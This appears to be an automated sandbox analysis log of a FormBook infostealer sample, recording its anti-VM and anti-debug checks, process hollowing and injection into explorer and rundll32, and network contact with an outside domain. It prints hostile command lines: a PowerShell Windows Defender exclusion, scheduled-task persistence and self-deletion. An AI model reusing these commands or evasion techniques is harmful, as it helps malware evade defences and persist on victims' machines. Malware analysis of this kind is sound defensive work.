Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3028, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000000099B7E second address: 0000000000099B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2592	Thread sleep time: -30293s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2064	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2152	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 9_2_00409AB0 rdtsc

9_2_00409AB0

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Queries a list of all running processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30293			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Enumerates the file system

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000A.00000000.552591069.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp	Binary or memory string: Y4*vMciU,ho)r;
Source: explorer.exe, 0000000A.00000000.552591069.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000003.472102078.0000000000809000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 0000000A.00000000.552449916.000000000449C000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0loQ&
Source: explorer.exe, 0000000A.00000000.490732590.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 9_2_00409AB0 rdtsc

9_2_00409AB0

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AC0080 mov ecx, dword ptr fs:[00000030h]		9_2_00AC0080
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AC00EA mov eax, dword ptr fs:[00000030h]		9_2_00AC00EA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AE26F8 mov eax, dword ptr fs:[00000030h]		9_2_00AE26F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025A26F8 mov eax, dword ptr fs:[00000030h]		11_2_025A26F8

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0040ACF0 LdrLoadDll,

9_2_0040ACF0

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.128.23.153 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.metafirstclass.com

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D80000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 1764			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY